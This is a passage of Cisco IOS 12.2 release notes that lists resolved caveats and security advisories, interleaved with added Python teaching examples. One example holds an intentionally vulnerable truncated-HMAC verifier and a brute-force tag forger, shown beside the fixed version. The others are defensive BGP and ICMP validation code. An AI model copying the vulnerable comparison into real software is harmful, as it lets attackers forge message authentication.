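    return hmac.new(auth_key, wire_msg, hashlib.sha1).digest()[:AUTH_TAG_LEN]


def verify_vulnerable(auth_key: bytes, wire_msg: bytes, received: bytes) -> bool:
    """Bug pattern: trust the length of the received field and compare only
    that many bytes of the expected tag.  A 1-byte field needs at most 256
    guesses; a 0-byte field is accepted outright."""
    expected = compute_tag(auth_key, wire_msg)
    return expected[:len(received)] == received


def verify_fixed(auth_key: bytes, wire_msg: bytes, received: bytes) -> bool:
    """Require the full 96-bit tag and compare it in constant time."""
    if len(received) != AUTH_TAG_LEN:
        return False
    return hmac.compare_digest(compute_tag(auth_key, wire_msg), received)


def guesses_to_forge(auth_key: bytes, wire_msg: bytes, verifier, tag_len: int = 1) -> int:
    """Brute-force a tag_len-byte tag against `verifier` without using the
    key.  Returns the number of guesses until one is accepted, or 0 if the
    whole space is rejected."""
    for n in range(256 ** tag_len):
        candidate = n.to_bytes(tag_len, "big")
        if verifier(auth_key, wire_msg, candidate):
            return n + 1
    return 0


if __name__ == "__main__":
    tag = compute_tag(SAMPLE_KEY, SAMPLE_MSG)
    print("vulnerable, honest tag accepted:", verify_vulnerable(SAMPLE_KEY, SAMPLE_MSG, tag))
    print("vulnerable, empty tag accepted:", verify_vulnerable(SAMPLE_KEY, SAMPLE_MSG, b""))
    print("vulnerable, 1-byte forgery accepted after",
          guesses_to_forge(SAMPLE_KEY, SAMPLE_MSG, verify_vulnerable), "guesses")
    print("fixed, 1-byte forgery accepted after",
          guesses_to_forge(SAMPLE_KEY, SAMPLE_MSG, verify_fixed), "guesses (0 = never)")
```

The fix has two parts that both matter: the receiver, not the sender, decides how long the tag must be, and the comparison does not leak which byte mismatched.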

CSCsg16908

Multiple vulnerabilities exist in the Cisco IOS File Transfer Protocol (FTP) Server feature. These vulnerabilities include Denial of Service, improper verification of user credentials and the ability to read or write any file in the device's filesystem, including the device's saved configuration, which may include passwords or other sensitive information.

The IOS FTP Server is an optional service that is disabled by default. Devices that are not specifically configured to enable the IOS FTP Server service are unaffected by these vulnerabilities.

These vulnerabilities do not apply to the IOS FTP Client feature.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070509-iosftp.shtml.

CSCsg40567

Symptoms: Malformed SSL packets may cause a router to leak multiple memory blocks.

Conditions: This symptom is observed on a Cisco router that has the ip http secure server command enabled.

Workaround: Disable the ip http secure server command.

CSCsj18014

Symptoms: A caller ID may be received with extra characters.

Conditions: This symptom is observed when caller ID is enabled on both routers and when the station ID and station name are configured on the FXS side.

Workaround: There is no workaround.

TCP/IP Host-Mode Services

CSCek37177

The Cisco IOS Transmission Control Protocol (TCP) listener in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable memory leak that may lead to a denial of service condition.

This vulnerability only applies to traffic destined to the Cisco IOS device. Traffic transiting the Cisco IOS device will not trigger this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers.

This issue is documented as Cisco bug ID CSCek37177.

There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-tcp.shtml

CSCse05736

Symptoms: A router that is running RCP can be reloaded by a specific packet.

Conditions: This symptom is seen under the following conditions:

The router must have RCP enabled.

The packet must come from the source address of the designated system configured to send RCP packets to the router.

The packet must have a specific data content.

Workaround: Apply access lists at the edge of your network that block RCP packets, so that spoofed RSH packets cannot reach the router. Alternatively, use another protocol such as SCP, or apply VTY access lists.

Resolved Caveats—Cisco IOS Release 12.2(29a)

Cisco IOS Release 12.2(29a) is a rebuild release for Cisco IOS Release 12.2(29). The caveats in this section are resolved in Cisco IOS Release 12.2(29a) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Miscellaneous

CSCeh13489

Symptoms: A router may reset its Border Gateway Protocol (BGP) session.

Conditions: This symptom is observed when a Cisco router that peers with other routers receives an Autonomous System (AS) path with a length that is equal to or greater than 255.

Workaround: Configure the bgp maxas limit command in such a way that the maximum length of the AS path is a value below 255. When the router receives an update with an excessive AS path length, the prefix is rejected and the event is recorded in the log.
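The 255 boundary in this caveat is not arbitrary: an AS_PATH attribute is a series of segments and each segment's ASN count is a single byte, so a path of 255 or more ASNs spans more than one segment and a receiver that sizes a buffer from one segment header can be caught out. The following Python is an added example, not Cisco code, showing how such a path is encoded, how to decode it without over-reading, and how a maxas-style limit rejects and logs an over-long path before it reaches the routing process. The ASNs, prefixes and the `accept_update` helper are constructed for the example.

```python
"""Added example: encode and decode a BGP AS_PATH attribute value and apply a
maxas-style limit.  Not Cisco code; the ASNs and prefixes are constructed."""
import logging
import struct

log = logging.getLogger("bgp")

AS_SET = 1
AS_SEQUENCE = 2
SEGMENT_CAP = 255  # the per-segment ASN count is one byte (RFC 4271, 4.3)


def encode_as_path(asns, four_byte=False):
    """Encode ASNs as consecutive AS_SEQUENCE segments.  More than 255 ASNs
    cannot fit in one segment, so the path is split across several."""
    fmt = ">I" if four_byte else ">H"
    out = bytearray()
    for start in range(0, len(asns), SEGMENT_CAP):
        chunk = asns[start:start + SEGMENT_CAP]
        out += bytes((AS_SEQUENCE, len(chunk)))
        for asn in chunk:
            out += struct.pack(fmt, asn)
    return bytes(out)


def decode_as_path(blob, four_byte=False):
    """Return a list of (segment_type, [asn, ...]).  Raises ValueError on a
    truncated or malformed encoding instead of reading past the buffer."""
    fmt = ">I" if four_byte else ">H"
    size = struct.calcsize(fmt)
    segments, pos = [], 0
    while pos < len(blob):
        if pos + 2 > len(blob):
            raise ValueError("truncated AS_PATH segment header")
        seg_type, count = blob[pos], blob[pos + 1]
        if seg_type not in (AS_SET, AS_SEQUENCE):
            raise ValueError("unknown segment type %d" % seg_type)
        pos += 2
        end = pos + count * size
        if end > len(blob):
            raise ValueError("truncated AS_PATH segment body")
        asns = [struct.unpack_from(fmt, blob, pos + i * size)[0] for i in range(count)]
        segments.append((seg_type, asns))
        pos = end
    return segments


def as_path_length(segments):
    """Total number of ASNs carried in the attribute, across all segments."""
    return sum(len(asns) for _, asns in segments)


def accept_update(prefix, as_path_blob, maxas, four_byte=False):
    """Model of a maxas limit: decode the path, and reject the prefix (with a
    log entry) when it carries more than `maxas` ASNs or is malformed.
    Returns True when the prefix is accepted."""
    try:
        segments = decode_as_path(as_path_blob, four_byte)
    except ValueError as exc:
        log.warning("%s: malformed AS_PATH (%s), prefix rejected", prefix, exc)
        return False
    length = as_path_length(segments)
    if length > maxas:
        log.warning("%s: AS_PATH length %d exceeds maxas limit %d, prefix rejected",
                    prefix, length, maxas)
        return False
    return True


# Constructed sample paths (2-byte ASNs).
SHORT_PATH = [65001, 65002, 65003]
LONG_PATH = [65000 + i for i in range(300)]   # 300 ASNs -> two segments

if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING, format="%(message)s")
    blob = encode_as_path(LONG_PATH)
    print("segments:", [(t, len(a)) for t, a in decode_as_path(blob)])
    print("long path accepted with maxas 254:", accept_update("192.0.2.0/24", blob, 254))
    print("short path accepted with maxas 254:",
          accept_update("198.51.100.0/24", encode_as_path(SHORT_PATH), 254))
```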

CSCei61732

Cisco IOS may permit arbitrary code execution after exploitation of a heap-based buffer overflow vulnerability. Cisco has included additional integrity checks in its software, as further described below, that are intended to reduce the likelihood of arbitrary code execution.

Cisco has made free software available that includes the additional integrity checks for affected customers.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051102-timers.shtml.

CSCsb12598

Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, these vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device, and they are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml.


Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml.


A combined software table for Cisco IOS is available to aid customers in choosing a software release that fixes all security vulnerabilities published as of May 22, 2007. This software table is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-cry-bundle.shtml.

Resolved Caveats—Cisco IOS Release 12.2(29)

This section describes possibly unexpected behavior by Cisco IOS Release 12.2(29). All the caveats listed in this section are resolved in Cisco IOS Release 12.2(29). This section describes severity 1 and 2 caveats and select severity 3 caveats.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCds33629

Symptoms: Closing an existing Telnet session may cause a router to crash.

Conditions: This symptom is platform-independent.

Workaround: There is no workaround.

CSCeg64124

Symptoms: The operation result of an IP SLA jitter probe shows a high packet MIA (missing in action) count that is equal to the jitter probe's number of packets minus one. On the responder router, the responder debug output shows many error packets.

Conditions: This symptom is observed when multiple jitter probes (either from the same router or from different routers) are configured to send packets to the same destination IP address and the same destination port number and when the responder is turned off for a short time and turned on again.

Workaround: To prevent the symptom from occurring, configure the jitter probe to use a unique destination port number.

Alternate Workaround: If the symptom has occurred, turn off the responder by entering the no rtr responder global configuration command, wait until all jitter probes report "No connection," and then turn on the responder by entering the rtr responder global configuration command.

CSCeh34983

Symptoms: A Cisco AS5400 gateway might stop unexpectedly, showing the following error message on the console:

Breakpoint exception, CPU signal 23, PC = 0x603955C0

Conditions: This symptom has been observed with Cisco IOS Release 12.2(27). It has not been seen on releases after Cisco IOS Release 12.2(4)T or on Cisco IOS Release 12.3 and later releases. The symptom has been seen only if an invalid attribute is configured in the profile.

Workaround: Configure all valid attributes in the profile.

DECnet

CSCed88563

Symptoms: Removing DECnet routing from the configuration of a Cisco router may cause the router to reload with a bus error.

Conditions: This symptom has been observed when more than one Tunnel interface is configured with a DECnet cost and the Tunnel interfaces are then removed. If DECnet is subsequently unconfigured globally with the no decnet routing command, the router reloads with a bus error.

Workaround: Remove the decnet cost configuration in the Tunnel interfaces before removing the Tunnel interfaces themselves.

IBM Connectivity

CSCsa45750

Symptoms: DLSw circuits are established over the same peer connection when there are multiple remote peer connections to the same remote MAC address.

Conditions: This symptom is observed when DLSw load-balancing is configured and when there are multiple peers that have the dlsw icanreach mac-address mac-addr command enabled with the same remote MAC address for the mac-addr argument.

Workaround: Bounce the DLSw peer connection either by entering the dlsw disable command or by removing and reconfiguring the DLSw remote peer statement.

Further Problem Description: You can verify that the symptom occurs when the output of the show dlsw reachability command does not list the remote peer for that MAC address with a status of UNCONFIRMED or FOUND.

Interfaces and Bridging

CSCeg73645

Symptoms: A Versatile Interface Processor 2-50 (VIP2-50) crashes because of a Cybus error with DMA receive errors.

Conditions: This symptom is observed on a Cisco 7500 series that runs Cisco IOS Release 12.1 and that is configured with a PA-2FE that is installed in a VIP2-50. The symptom may also occur in other releases.

Workaround: There is no workaround.

CSCin86455

Symptoms: Auto-provisioning may be disabled on a Cisco 7200 series that is configured with a PA-A3 port adapter.

Conditions: This symptom is observed when a VC class that is configured for create on-demand is attached to the main ATM interface and then the create on-demand configuration is removed and re-applied to the VC class.

Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the ATM interface of the PA-A3 port adapter.

IP Routing Protocols

CSCef60659

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages

2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks

3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.

CSCef93215

Symptoms: A router that is configured for OSPF may reload unexpectedly and reference the "ospf_build_one_paced_update" process.

Conditions: This is observed on a Cisco router that has a mixture of LSAs (of type 5 and 11) that travel throughout an autonomous system and LSAs (of any type other than type 5 and 11) that travel within a particular OSPF area. The symptom may occur at any time without any specific changes or configuration and is not specifically related to any type of LSA.

Workaround: There is no workaround.

Further Problem Description: The symptom is very unlikely to occur. The symptom does not occur on a router that has exclusively stub areas and NSSA areas. The symptom may occur when a router does not have exclusively stub areas and NSSA areas.

CSCsa51150

Symptoms: When Network Address Translation (NAT) is configured, TCP translations do not time out properly when the TCP session is closed in the normal way.

Conditions: This symptom is observed on a Cisco platform that runs Cisco IOS Release 12.3 and that integrates the fix for CSCed93710. A list of the affected releases can be found at http://www.cisco.com/pcgi-bin/Support/Bugtool/onebug.pl?bugid=CSCed93710.

Workaround: Lower the global NAT translation timeout period with the ip nat translation tcp-timeout seconds command.

CSCsa59600

A document that describes how the Internet Control Message Protocol (ICMP) could be used to perform a number of Denial of Service (DoS) attacks against the Transmission Control Protocol (TCP) has been made publicly available. This document has been published through the Internet Engineering Task Force (IETF) Internet Draft process, and is entitled "ICMP Attacks Against TCP" (draft-gont-tcpm-icmp-attacks-03.txt).

These attacks, which only affect sessions terminating or originating on a device itself, can be of three types:

1. Attacks that use ICMP "hard" error messages

2. Attacks that use ICMP "fragmentation needed and Don't Fragment (DF) bit set" messages, also known as Path Maximum Transmission Unit Discovery (PMTUD) attacks

3. Attacks that use ICMP "source quench" messages

Successful attacks may cause connection resets or reduction of throughput in existing connections, depending on the attack type.

Multiple Cisco products are affected by the attacks described in this Internet draft.

Cisco has made free software available to address these vulnerabilities. In some cases there are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml.

The disclosure of these vulnerabilities is being coordinated by the National Infrastructure Security Coordination Centre (NISCC), based in the United Kingdom. NISCC is working with multiple vendors whose products are potentially affected. Its posting can be found at: http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en.
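The ICMP-against-TCP attacks described under CSCef60659 and CSCsa59600 above work because an ICMP error only needs to quote the first 8 bytes of the offending TCP segment, so an off-path attacker can forge one by guessing the 4-tuple. The countermeasure the draft proposes is to validate the quoted segment against local connection state: the 4-tuple must match a live connection and the quoted sequence number must fall inside that connection's send window, which an off-path attacker cannot easily guess. The following Python is an added example of that check, not Cisco code; the ICMP messages, the connection table and the `handle_icmp_error` policy (source quench ignored, validated hard errors treated as soft, frag-needed applied) are constructed for the example.

```python
"""Added example: validate an inbound ICMP error against local TCP state
before acting on it (the sequence-number check proposed in "ICMP Attacks
Against TCP").  Not Cisco code; all messages and connections are constructed."""
import struct
from dataclasses import dataclass

ICMP_DEST_UNREACH = 3
ICMP_SOURCE_QUENCH = 4
IPPROTO_TCP = 6
HARD_CODES = {2: "protocol unreachable", 3: "port unreachable"}  # RFC 1122 hard errors
CODE_FRAG_NEEDED = 4                                               # PMTUD message


@dataclass
class TcpConn:
    local_ip: str
    local_port: int
    remote_ip: str
    remote_port: int
    snd_una: int   # oldest unacknowledged sequence number
    snd_nxt: int   # next sequence number to be sent


def _ip(dotted):
    return bytes(int(x) for x in dotted.split("."))


def build_icmp_error(icmp_type, code, mtu, src, dst, sport, dport, seq):
    """Constructed ICMP error: 8-byte ICMP header, the quoted datagram's
    20-byte IP header (no options) and the first 8 bytes of its TCP header."""
    ip_hdr = struct.pack(">BBHHHBBH4s4s", 0x45, 0, 48, 0, 0x4000, 64,
                         IPPROTO_TCP, 0, _ip(src), _ip(dst))
    tcp8 = struct.pack(">HHI", sport, dport, seq)
    return struct.pack(">BBHHH", icmp_type, code, 0, 0, mtu) + ip_hdr + tcp8


def parse_icmp_error(msg):
    """Extract type/code, next-hop MTU and the quoted 4-tuple plus sequence
    number.  Returns None when the quoted datagram is not TCP or is short."""
    icmp_type, code, _csum, _unused, mtu = struct.unpack_from(">BBHHH", msg, 0)
    ip = msg[8:]
    if len(ip) < 20:
        return None
    ihl = (ip[0] & 0x0F) * 4
    if ip[9] != IPPROTO_TCP or len(ip) < ihl + 8:
        return None
    src = ".".join(str(b) for b in ip[12:16])
    dst = ".".join(str(b) for b in ip[16:20])
    sport, dport, seq = struct.unpack_from(">HHI", ip, ihl)
    return {"type": icmp_type, "code": code, "mtu": mtu,
            "src": src, "dst": dst, "sport": sport, "dport": dport, "seq": seq}


def _in_send_window(seq, conn):
    # Modulo-2^32 comparison: SND.UNA <= seq < SND.NXT.
    return (seq - conn.snd_una) % (1 << 32) < (conn.snd_nxt - conn.snd_una) % (1 << 32)


def handle_icmp_error(msg, conns):
    """Return (action, detail).  Only an error whose quoted segment matches a
    live connection and whose sequence number is inside that connection's
    send window is trusted; anything else is ignored."""
    err = parse_icmp_error(msg)
    if err is None:
        return ("ignore", "not a TCP error")
    # The quoted datagram was sent by us, so its source is our local end.
    conn = conns.get((err["src"], err["sport"], err["dst"], err["dport"]))
    if conn is None:
        return ("ignore", "no matching connection")
    if not _in_send_window(err["seq"], conn):
        return ("ignore", "sequence number outside send window")
    if err["type"] == ICMP_SOURCE_QUENCH:
        return ("ignore", "source quench is not acted upon")
    if err["type"] == ICMP_DEST_UNREACH and err["code"] == CODE_FRAG_NEEDED:
        return ("reduce-mtu", err["mtu"])
    if err["type"] == ICMP_DEST_UNREACH and err["code"] in HARD_CODES:
        # Validated hard error on an established connection: log and keep
        # the connection (treat as soft) rather than aborting it.
        return ("soft-error", HARD_CODES[err["code"]])
    return ("ignore", "unhandled type/code")


# Constructed connection table: one established session.
CONNS = {("192.0.2.10", 40000, "198.51.100.5", 80):
         TcpConn("192.0.2.10", 40000, "198.51.100.5", 80, 1000, 1460)}

if __name__ == "__main__":
    forged = build_icmp_error(ICMP_DEST_UNREACH, 3, 0, "192.0.2.10", "198.51.100.5", 40000, 80, 777777)
    print("forged port-unreachable:", handle_icmp_error(forged, CONNS))
    pmtu = build_icmp_error(ICMP_DEST_UNREACH, 4, 1280, "192.0.2.10", "198.51.100.5", 40000, 80, 1200)
    print("in-window frag-needed:", handle_icmp_error(pmtu, CONNS))
```

The window check is the part that raises the attacker's cost: with a 4-tuple alone the forgery is a port-guessing exercise, but a sequence number inside SND.UNA..SND.NXT has to be guessed out of a 32-bit space per try, and the rest of the policy never acts on an error that fails it.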

Miscellaneous

CSCeb07656

Symptoms: There is no connectivity over an MLP link.

Conditions: This symptom is observed on a Cisco Catalyst 6000 series that is configured with a FlexWAN in which a port adapter is installed. MLP is configured on an interface of the port adapter.

Workaround: Enter the shutdown interface configuration command followed by the no shutdown interface configuration command on the affected interface.

CSCeb60397

Symptoms: A router crashes when you run the expValueCounter64Val object in the Expression MIB.

Conditions: This symptom is observed on a Cisco router when the expObjectSampleType object is set to delta (2) in the expValueCounter64Val object.

Workaround: There is no workaround.

CSCec65977

Symptoms: A 4-port serial enhanced port adapter (PA-4T+) may receive packets, even though the status of the serial interface is "down/down."

Conditions: This symptom is observed on a PA-4T+ that is installed in a Cisco 7200 series router and that is connected to a 1-port serial WAN interface card (WIC-1T) that is installed in a Cisco 2600 series. The serial interfaces of both routers are connected with a CSU/DSU.

The input packet counter of the serial port of the PA-4T+ increments even though the status of the serial interface is "down/down." However, the 2600 series functions properly, and the input packet counter of its serial interface does not increment.

Possible Workaround: Administratively shut down the serial port.

CSCed55201

Symptoms: A serial interface may stop transmitting, and the following error message may be generated:

%RSP-3-RESTART: interface Serial1/0/2, not transmitting

-Traceback= 403D8D88 403E2830 4036B72C 4036B718

Conditions: This symptom is observed on a Cisco 7500 series that is configured with an 8-port serial V.35 port adapter (PA-8T-V35).

Workaround for HDLC interfaces: Disable CDP, the passive interface, and the outbound IP ACL.

Workaround for Frame Relay interfaces: Disable CDP, the passive interface, the outbound IP ACL, and LMI.

CSCee47441

Symptoms: When the Cisco IOS Firewall (CBAC) is configured, the router may undergo a software-forced reload triggered by one of the protocol inspections it performs.

Conditions: This symptom is observed when the router is part of a DMVPN hub-spoke with a Cisco VoIP phone solution deployed on it and the router is connected to the central office over the Internet. The Cisco VoIP phone runs the SKINNY protocol.

Workaround: There is no workaround.

CSCef02332

Symptoms: A Cisco 7200 series with high-speed serial interfaces such as HSSI interfaces or PA-2T3+ interfaces may reload unexpectedly.

Conditions: This symptom is observed after you have performed an OIR of the HSSI or PA-2T3+ port adapter while traffic was being processed.

Workaround: Stop the traffic while you perform the OIR or shut down the port adapter before you perform the OIR.

CSCeg09274

Symptoms: The line protocol of a serial interface of a PA-E3 may go down, and the output of the show interfaces serial slot/port command shows that the output queue is wedged (Output queue: 40/40) and that output drops increase.

Conditions: This symptom is observed on a Cisco 7204VXR that is equipped with a PA-E3 when a Fast Ethernet interface is either shut down or disconnected and when the router is configured in the following way:

The encapsulation frame-relay, frame-relay traffic-shaping, and tx-ring-limit ring-limit commands are enabled on the serial interface of the PA-E3.

Multiple point-to-point subinterfaces with different Frame Relay Traffic Shaping (FRTS) parameters are applied on each of the subinterfaces, and Class Based Weighted Fair Queueing (CBWFQ) is applied on some of the subinterfaces.

Workaround: Either enter the shutdown command followed by no shutdown command on the serial interface of the PA-E3 or enter the clear interface serial slot/port command on the serial interface of the PA-E3.

CSCeg84558

Symptoms: A Cisco 3745 reloads because of a bus error. Just before the crash, the following error messages are generated:

%SYS-3-BAD_RESET: Questionable reset of process 149 on tty123

%SYS-3-HARIKARI: Process Exec top-level routine exited

Conditions: This symptom is observed on a Cisco 3745 that runs Cisco IOS Release 12.2(26) or Release 12.3(12) and that has an NM-2CE1T1-PRI network module that is configured for ISDN dial-in.

Workaround: There is no workaround.

CSCeh30146

Symptoms: A WIC-1DSU-T1-V2 card may become stuck and no longer detect alarms, loopback events, or similar conditions.

Conditions: When this symptom occurs, the WIC-1DSU-T1-V2 may still be able to pass traffic.

Workaround: Bring the card up again by entering the clear service-module serial slot/port command.

CSCeh71727

Symptoms: The TCP Window size is changed after NAT translation.

Conditions: This symptom is observed on a Cisco 7200 router with an NSE-1 processor board when PXF and NAT are enabled and TCP packets get forwarded.

Workaround: Disable PXF globally by using the no ip pxf command in the configuration.

CSCeh74304

Symptoms: Packets going in and out of the same NAT inside interface are getting translated.

Conditions: This symptom is observed on a Cisco 7200 with an NSE-1 processor board when PXF and NAT are enabled.

Workaround: Disable PXF globally by using the no ip pxf command in the configuration.

CSCin68688

Symptoms: A Cisco 7200 series may reload unexpectedly when you perform an OIR of a PA-8T-V.35 serial port adapter. The tracebacks point to the mxt_periodic_processing routine.

Conditions: This symptom is observed on a Cisco 7200 series that is configured with an NPE-G1 and that processes a high load of AToM bidirectional traffic.

Workaround: Shut down the serial interface before you perform the OIR.

CSCsa55375

Symptoms: A high error rate may occur on a WIC-1DSU-T1-V2. Because of the large number of errors, the interface of the WIC-1DSU-T1-V2 may not come up.

Conditions: These symptoms are observed on a WIC-1DSU-T1-V2 that is installed in a Cisco router.

Possible Workaround: The symptoms may clear when you replace the in-house cabling with Cat.5 cables.

CSCsa70703

Symptoms: A memory leak on a Cisco gatekeeper causes memory usage to increase constantly.

Conditions: This symptom has been observed on a Cisco gatekeeper that runs Cisco IOS Release 12.2(8)T1 or a later release. The directory gatekeeper (DGK) leaks memory when sequential LRQ is configured and there is only one remote zone to forward LRQs to.

Workaround: There is no workaround.

Wide-Area Networking

CSCec27865

Symptoms: Packet forwarding may not function properly on a terminated Frame Relay permanent virtual circuit (PVC) that is configured on an ISDN link.

Conditions: This symptom is observed on a Cisco 7200 series. The symptom does not occur on other platforms.

Workaround: There is no workaround.

Resolved Caveats—Cisco IOS Release 12.2(28d)

Cisco IOS Release 12.2(28d) is a rebuild release for Cisco IOS Release 12.2(28). The caveats in this section are resolved in Cisco IOS Release 12.2(28d) but may be open in previous Cisco IOS releases.

The following information is provided for each caveat:

Symptoms: A description of what is observed when the caveat occurs.

Conditions: The conditions under which the caveat has been known to occur.

Workaround: Solutions, if available, to counteract the caveat.

Basic System Services

CSCeg62070

Symptoms: Tracebacks or a crash may be seen during HTTP transactions with long URLs.

Conditions: The crash is seen when the length of any token in the URL of the request is excessively long.

Workaround: Disable HTTP server using the no ip http server command.

CSCsc64976

A vulnerability exists in the IOS HTTP server in which HTML code inserted into dynamically generated output, such as the output from a show buffers command, is passed unescaped to the browser requesting the page. This HTML code could be interpreted by the client browser and used to execute malicious commands against the device or to mount other cross-site scripting attacks. Successful exploitation of this vulnerability requires that a user browse a page containing dynamic content into which HTML commands have been injected.

Cisco will be making free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20051201-http.shtml

CSCsj44081

Cisco IOS Software has been enhanced with the introduction of additional software checks to signal improper use of internal data structures. This enhancement was introduced in select Cisco IOS software releases published after April 5, 2007.

Details: With the new enhancement in place, Cisco IOS software will emit a "%DATACORRUPTION-1-DATAINCONSISTENCY" error message when it detects an inconsistency in its internal data structures. This is a new error message. The following is an example.

The %DATACORRUPTION-1-DATAINCONSISTENCY error message is preceded by a timestamp, for example:

May 17 10:01:27.815 UTC: %DATACORRUPTION-1-DATAINCONSISTENCY: copy error

The error message is then followed by a traceback.

It is important to note that this error message does not imply that packet data is being corrupted. It does, however, provide an early indicator of other conditions that can eventually lead to poor system performance or an IOS restart.

Recommended Action: Collect show tech-support command output and open a service request with the Technical Assistance Center (TAC) or designated support organization. Pay particular attention to any other error messages or error symptoms that accompany the "%DATACORRUPTION-1-DATAINCONSISTENCY" message and note those to your support contact.

IBM Connectivity

CSCsf28840

A vulnerability exists in the Data-link Switching (DLSw) feature in Cisco IOS where an invalid value in a DLSw message could result in a reload of the DLSw device. Successful exploitation of this vulnerability requires that an attacker be able to establish a DLSw connection to the device.

There are workarounds available for this vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070110-dlsw.shtml

IP Routing Protocols

CSCec71950

Cisco routers and switches running Cisco IOS or Cisco IOS XR software may be vulnerable to a remotely exploitable crafted IP option Denial of Service (DoS) attack. Exploitation of the vulnerability may potentially allow for arbitrary code execution. The vulnerability may be exploited after processing an Internet Control Message Protocol (ICMP) packet, Protocol Independent Multicast version 2 (PIMv2) packet, Pragmatic General Multicast (PGM) packet, or URL Rendezvous Directory (URD) packet containing a specific crafted IP option in the packet's IP header. No other IP protocols are affected by this issue.

Cisco has made free software available to address this vulnerability for affected customers.

There are workarounds available to mitigate the effects of the vulnerability.

This vulnerability was discovered during internal testing.

This advisory is available at:

http://www.cisco.com/warp/public/707/cisco-sa-20070124-crafted-ip-option.shtml

CSCin95836

The Cisco Next Hop Resolution Protocol (NHRP) feature in Cisco IOS contains a vulnerability that can result in a restart of the device or possible remote code execution.

NHRP is a primary component of the Dynamic Multipoint Virtual Private Network (DMVPN) feature.

NHRP can operate in three ways: at the link layer (Layer 2), over Generic Routing Encapsulation (GRE) and multipoint GRE (mGRE) tunnels, and directly on IP (IP protocol number 54). This vulnerability affects all three methods of operation.

NHRP is not enabled by default for Cisco IOS.

This vulnerability is addressed by Cisco bug IDs CSCin95836 for non-12.2 mainline releases and CSCsi23231 for 12.2 mainline releases.

This advisory is posted at

http://www.cisco.com/warp/public/707/cisco-sa-20070808-nhrp.shtml.

Miscellaneous

CSCsb11124

The Cisco IOS Stack Group Bidding Protocol (SGBP) feature in certain versions of Cisco IOS software is vulnerable to a remotely-exploitable denial of service condition. Devices that do not support or have not enabled the SGBP protocol are not affected by this vulnerability.

Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

Cisco has published a Security Advisory on this issue; it is available at http://www.cisco.com/warp/public/707/cisco-sa-20060118-sgbp.shtml

CSCsb12598

Cisco IOS device may crash while processing malformed Secure Sockets Layer (SSL) packets. In order to trigger these vulnerabilities, a malicious client must send malformed packets during the SSL protocol exchange with the vulnerable device.

Successful repeated exploitation of any of these vulnerabilities may lead to a sustained Denial-of-Service (DoS); however, these vulnerabilities are not known to compromise either the confidentiality or integrity of the data or the device, and they are not believed to allow an attacker to decrypt any previously encrypted information.

Cisco IOS is affected by the following vulnerabilities:

Processing ClientHello messages, documented as Cisco bug ID CSCsb12598

Processing ChangeCipherSpec messages, documented as Cisco bug ID CSCsb40304

Processing Finished messages, documented as Cisco bug ID CSCsd92405

Cisco has made free software available to address these vulnerabilities for affected customers. There are workarounds available to mitigate the effects of these vulnerabilities.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20070522-SSL.shtml

Note: Another related advisory has been posted with this advisory. This additional advisory also describes a vulnerability related to cryptography that affects Cisco IOS. This related advisory is available at the following link: http://www.cisco.com/warp/public/707/cisco-sa-20070522-crypto.shtml

